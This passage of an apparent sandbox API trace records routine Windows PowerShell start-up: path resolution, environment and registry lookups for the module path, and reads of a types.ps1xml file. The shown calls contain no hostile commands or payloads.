lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.208] SetConsoleCtrlHandler (HandlerRoutine=0x2ae68dc, Add=1) returned 1 [0099.238] GetStdHandle (nStdHandle=0xfffffff6) returned 0x108 [0099.241] GetConsoleCP () returned 0x1b5 [0099.251] GetFileType (hFile=0x108) returned 0x3 [0099.265] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334 [0099.267] CoCreateGuid (in: pguid=0x10db70 | out: pguid=0x10db70*(Data1=0x4b3e9cb6, Data2=0x356b, Data3=0x4d4e, Data4=([0]=0x9e, [1]=0x87, [2]=0x66, [3]=0x34, [4]=0x6b, [5]=0xe2, [6]=0xb1, [7]=0x9c))) returned 0x0 [0099.268] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.268] CoTaskMemFree (pv=0x2af370) [0099.301] WinSqmIsOptedIn () returned 0x0 [0099.302] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.302] CoTaskMemFree (pv=0x2af370) [0099.307] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.307] CoTaskMemFree (pv=0x2af370) [0099.308] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.308] CoTaskMemFree (pv=0x2af370) [0099.311] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.311] CoTaskMemFree (pv=0x2af370) [0099.312] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.312] CoTaskMemFree (pv=0x2af370) [0099.331] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.331] CoTaskMemFree (pv=0x2af370) [0099.334] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.334] CoTaskMemFree (pv=0x2af370) [0099.336] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.336] CoTaskMemFree (pv=0x2af370) [0099.344] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.344] CoTaskMemFree (pv=0x2af370) [0099.351] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.352] CoTaskMemFree (pv=0x2af370) [0099.353] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.353] CoTaskMemFree (pv=0x2af370) [0099.354] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.354] CoTaskMemFree (pv=0x2af370) [0099.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.718] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.718] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0099.718] CoTaskMemFree (pv=0x2af370) [0099.719] CoTaskMemAlloc (cb=0xcc) returned 0x28a190 [0099.719] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x28a190, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0099.719] CoTaskMemFree (pv=0x28a190) [0099.719] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6e8 | out: phkResult=0x10d6e8*=0x338) returned 0x0 [0099.720] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d66c, lpData=0x0, lpcbData=0x10d668*=0x0 | out: lpType=0x10d66c*=0x2, lpData=0x0, lpcbData=0x10d668*=0x6c) returned 0x0 [0099.720] CoTaskMemAlloc (cb=0x70) returned 0x231930 [0099.720] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d63c, lpData=0x231930, lpcbData=0x10d638*=0x6c | out: lpType=0x10d63c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x10d638*=0x6c) returned 0x0 [0099.720] CoTaskMemFree (pv=0x231930) [0099.720] CoTaskMemAlloc (cb=0xcc) returned 0x28a190 [0099.720] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x28a190, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0099.720] CoTaskMemFree (pv=0x28a190) [0099.720] CoTaskMemAlloc (cb=0xcc) returned 0x28a190 [0099.720] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x28a190, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0099.720] CoTaskMemFree (pv=0x28a190) [0099.723] RegCloseKey (hKey=0x338) returned 0x0 [0099.723] CoTaskMemAlloc (cb=0xcc) returned 0x28a190 [0099.723] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x28a190, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0099.723] CoTaskMemFree (pv=0x28a190) [0099.723] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6e8 | out: phkResult=0x10d6e8*=0x338) returned 0x0 [0099.723] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d66c, lpData=0x0, lpcbData=0x10d668*=0x0 | out: lpType=0x10d66c*=0x0, lpData=0x0, lpcbData=0x10d668*=0x0) returned 0x2 [0099.723] RegCloseKey (hKey=0x338) returned 0x0 [0099.728] CoTaskMemAlloc (cb=0x20c) returned 0x284c50 [0099.729] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x284c50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0099.730] CoTaskMemFree (pv=0x284c50) [0099.730] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0099.731] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0099.737] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.737] CoTaskMemFree (pv=0x2af370) [0099.739] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.739] CoTaskMemFree (pv=0x2af370) [0099.744] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.744] CoTaskMemFree (pv=0x2af370) [0099.744] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.744] CoTaskMemFree (pv=0x2af370) [0099.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4d8 | out: phkResult=0x10d4d8*=0x340) returned 0x0 [0099.748] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x10d4ec, lpData=0x0, lpcbData=0x10d4e8*=0x0 | out: lpType=0x10d4ec*=0x1, lpData=0x0, lpcbData=0x10d4e8*=0x74) returned 0x0 [0099.749] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x10d45c, lpData=0x0, lpcbData=0x10d458*=0x0 | out: lpType=0x10d45c*=0x1, lpData=0x0, lpcbData=0x10d458*=0x74) returned 0x0 [0099.749] CoTaskMemAlloc (cb=0x78) returned 0x231930 [0099.749] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x10d42c, lpData=0x231930, lpcbData=0x10d428*=0x74 | out: lpType=0x10d42c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d428*=0x74) returned 0x0 [0099.749] CoTaskMemFree (pv=0x231930) [0099.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0099.749] SetErrorMode (uMode=0x1) returned 0x1 [0099.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d3b0 | out: lpFileInformation=0x10d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0099.749] SetErrorMode (uMode=0x1) returned 0x1 [0099.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0099.751] SetErrorMode (uMode=0x1) returned 0x1 [0099.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3b0 | out: lpFileInformation=0x10d3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0099.752] SetErrorMode (uMode=0x1) returned 0x1 [0099.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0099.755] SetErrorMode (uMode=0x1) returned 0x1 [0099.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3b0 | out: lpFileInformation=0x10d3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0099.756] SetErrorMode (uMode=0x1) returned 0x1 [0099.759] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.759] CoTaskMemFree (pv=0x2af370) [0099.766] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0099.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.766] CoTaskMemFree (pv=0x2af370) [0099.767] GetACP () returned 0x4e4 [0099.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0099.781] SetErrorMode (uMode=0x1) returned 0x1 [0099.782] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0099.782] GetFileType (hFile=0x344) returned 0x1 [0099.782] SetErrorMode (uMode=0x1) returned 0x1 [0099.782] GetFileType (hFile=0x344) returned 0x1 [0099.787] ReadFile (in: hFile=0x344, lpBuffer=0x2f8d908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f8d908*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0099.791] ReadFile (in: hFile=0x344, lpBuffer=0x2f8d908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f8d908*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0099.791] ReadFile (in: hFile=0x344, lpBuffer=0x2f8d908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f8d908*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0099.792] ReadFile (in: hFile=0x344, lpBuffer=0x2f8d908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f8d908*, lpNumberOfBytesRead=0x10d2e8*=0xcf3, lpOverlapped=0x0) returned 1 [0099.792] ReadFile (in: hFile=0x344, lpBuffer=0x2f8cd63, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f8cd63*, lpNumberOfBytesRead=0x10d2e8*=0x0, lpOverlapped=0x0) returned 1 [0099.792] ReadFile (in: hFile=0x344, lpBuffer=0x2f8d908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2f8d908*, lpNumberOfBytesRead=0x10d2e8*=0x0, lpOverlapped=0x0) returned 1 [0099.794] CloseHandle (hObject=0x344) returned 1 [0099.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0099.796] SetErrorMode (uMode=0x1) returned 0x1 [0099.796] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d260 | out: lpFileInformation=0x10d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0099.797] SetErrorMode (uMode=0x1) returned 0x1 [0099.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0099.798] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d348 | out: phkResult=0x10d348*=0x344) returned 0x0 [0099.798] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d2cc, lpData=0x0, lpcbData=0x10d2c8*=0x0 | out: lpType=0x10d2cc*=0x1, lpData=0x0, lpcbData=0x10d2c8*=0x56) returned 0x0 [0099.798] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a5980 [0099.798] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d29c, lpData=0x1b9a5980, lpcbData=0x10d298*=0x56 | out: lpType=0x10d29c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d298*=0x56) returned 0x0 [0099.798] CoTaskMemFree (pv=0x1b9a5980) [0099.798] RegCloseKey 